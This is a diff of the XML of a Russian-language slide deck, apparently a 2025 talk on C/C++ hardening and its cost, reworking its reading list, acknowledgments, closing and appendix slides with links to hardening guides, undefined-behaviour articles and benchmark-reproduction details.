-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>hardening</a:t>
-            </a:r>
+            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>OpenSSF</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t> Compiler Options Hardening Guide for C and C++</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId5"/>
-              </a:rPr>
-              <a:t>Linux Hardening Guide</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Статьи </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>John </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Regehr</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>про </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>UB</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId6"/>
-              </a:rPr>
-              <a:t>A Guide to Undefined Behavior in C and C++</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId7"/>
-              </a:rPr>
-              <a:t>UB in 2017</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -32982,7 +33476,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F156ECC1-89ED-435D-9383-51CEED6C2D15}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AD9F63E-EF6A-418A-B986-AFC03C54C97A}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33006,10 +33500,40 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="6" name="Picture 5">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C841CB5-A008-4A28-8093-D8120C530F20}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId5"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2702858" y="2731288"/>
+            <a:ext cx="5844989" cy="2510688"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3985882342"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2965541207"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -33041,7 +33565,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F5BE8CA-1735-42C5-903D-AFD61631E803}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DE0E5C5-D212-445A-B152-EE70980D9FFC}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33059,9 +33583,12 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Благодарности</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:t>Что почитать </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>?</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -33070,7 +33597,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEF6EEF7-8884-4F6A-BCAB-68EF33B42776}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{947FFF96-69F7-4C4A-8AAB-7A04BDA9C83C}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33088,7 +33615,20 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Сергей Бронников (VK Tech/Tarantool)</a:t>
+              <a:t>Примеры атак</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Nightmare</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -33096,13 +33636,92 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>https://bronevichok.ru/</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>Overview of GLIBC heap exploitation techniques</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Руководства по </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>hardening</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>OpenSSF</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t> Compiler Options Hardening Guide for C and C++</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId5"/>
+              </a:rPr>
+              <a:t>Linux Hardening Guide</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Статьи </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>John </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Regehr</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>про </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>UB</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId6"/>
+              </a:rPr>
+              <a:t>A Guide to Undefined Behavior in C and C++</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId7"/>
+              </a:rPr>
+              <a:t>UB in 2017</a:t>
+            </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
@@ -33112,7 +33731,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D845B46-0A58-4C4D-AD1F-C171EA425E87}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F156ECC1-89ED-435D-9383-51CEED6C2D15}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33139,7 +33758,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3824336305"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3985882342"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -33171,7 +33790,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA3C8DD7-2659-4877-AB44-B521617A7883}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F5BE8CA-1735-42C5-903D-AFD61631E803}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33189,7 +33808,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Спасибо за внимание !</a:t>
+              <a:t>Благодарности</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -33200,7 +33819,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A014712-4ABE-498A-9B77-26D4F051DB7C}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEF6EEF7-8884-4F6A-BCAB-68EF33B42776}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33218,7 +33837,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Полная версия слайдов доступна по адресу</a:t>
+              <a:t>Сергей Бронников (VK Tech/Tarantool)</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -33228,70 +33847,21 @@
               <a:rPr lang="en-US" dirty="0">
                 <a:hlinkClick r:id="rId2"/>
               </a:rPr>
-              <a:t>https://github.com/yugr/slides/blob/main/CppZeroCost/2025/RU.pptx</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
+              <a:t>https://bronevichok.ru/</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
           <a:p>
             <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Вопросы</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> ?</a:t>
-            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="5" name="Picture 4">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DC4F7E3-DA50-4105-92F5-2DAFFC744B19}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId3">
-            <a:extLst>
-              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-              </a:ext>
-            </a:extLst>
-          </a:blip>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4048685" y="2932580"/>
-            <a:ext cx="2857500" cy="2857500"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
       <p:sp>
         <p:nvSpPr>
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A51005D-9E17-47C5-BDBD-99FFE4265CB4}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D845B46-0A58-4C4D-AD1F-C171EA425E87}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33318,7 +33888,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="836139563"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3824336305"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -33350,7 +33920,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E8E47BF-47BB-42B9-B025-B0A5D6833D5D}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA3C8DD7-2659-4877-AB44-B521617A7883}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33368,7 +33938,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Приложения</a:t>
+              <a:t>Спасибо за внимание !</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -33376,10 +33946,10 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="3" name="Text Placeholder 2">
+          <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{448D2064-70B6-47CB-BA79-87C67150F18F}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A014712-4ABE-498A-9B77-26D4F051DB7C}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33387,7 +33957,7 @@
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
           <p:nvPr>
-            <p:ph type="body" idx="1"/>
+            <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
         <p:spPr/>
@@ -33395,16 +33965,82 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:endParaRPr lang="en-US"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Полная версия слайдов доступна по адресу</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>https://github.com/yugr/slides/blob/main/CppZeroCost/2025/RU.pptx</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Вопросы</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> ?</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="5" name="Picture 4">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DC4F7E3-DA50-4105-92F5-2DAFFC744B19}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:extLst>
+              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+              </a:ext>
+            </a:extLst>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4048685" y="2932580"/>
+            <a:ext cx="2857500" cy="2857500"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
       <p:sp>
         <p:nvSpPr>
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DF2943A-E379-4742-8C1A-0BAC9F109FE2}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A51005D-9E17-47C5-BDBD-99FFE4265CB4}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33431,7 +34067,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2401149323"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="836139563"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -33463,7 +34099,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC7532A-964A-431E-A4F5-80DD903BB997}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E8E47BF-47BB-42B9-B025-B0A5D6833D5D}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33481,7 +34117,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Воспроизведение результатов</a:t>
+              <a:t>Приложения</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -33489,10 +34125,10 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
+          <p:cNvPr id="3" name="Text Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C484971-452F-45F6-AD84-582487E77763}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{448D2064-70B6-47CB-BA79-87C67150F18F}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33500,204 +34136,15 @@
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
           <p:nvPr>
-            <p:ph idx="1"/>
+            <p:ph type="body" idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
-          </a:bodyPr>
+          <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Версии дистрибутивов</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Проверялись последние </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" i="1" dirty="0"/>
-              <a:t>стабильные</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> версии</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Debian 12 (bookworm), Fedora 42, Ubuntu 24.04 (noble)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Версии браузеров</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>https://github.com/mozilla-firefox/firefox</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>коммит </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>b0ca903b</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chrome: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>https://chromium.googlesource.com/chromium/src</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>коммит </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>d0273f3d</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>)</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Замеры производительности </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Компилировали </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CGBuiltin.cpp c -O2 (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>самый большой файл)</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>https://github.com/yugr/slides/tree/main/CppZeroCost/2025/bench</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Подсчёт</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> CVE/KEV</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>-метрик</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId5"/>
-              </a:rPr>
-              <a:t>https://github.com/yugr/slides/tree/main/CppZeroCost/2025/scripts</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Пруфлинки и дополнительная информация доступны в файле</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId6"/>
-              </a:rPr>
-              <a:t>https://github.com/yugr/slides/blob/main/CppZeroCost/2025/plan.md</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -33706,7 +34153,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DD3E67F-01FC-47C1-BE9B-97F0109DAF0E}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DF2943A-E379-4742-8C1A-0BAC9F109FE2}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33733,7 +34180,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4165890631"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2401149323"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -33765,7 +34212,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5428FA22-62FE-4C96-A191-27CEAA157124}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC7532A-964A-431E-A4F5-80DD903BB997}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -33782,17 +34229,10 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Stack Protector: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Как включить</a:t>
-            </a:r>
-            <a:r>
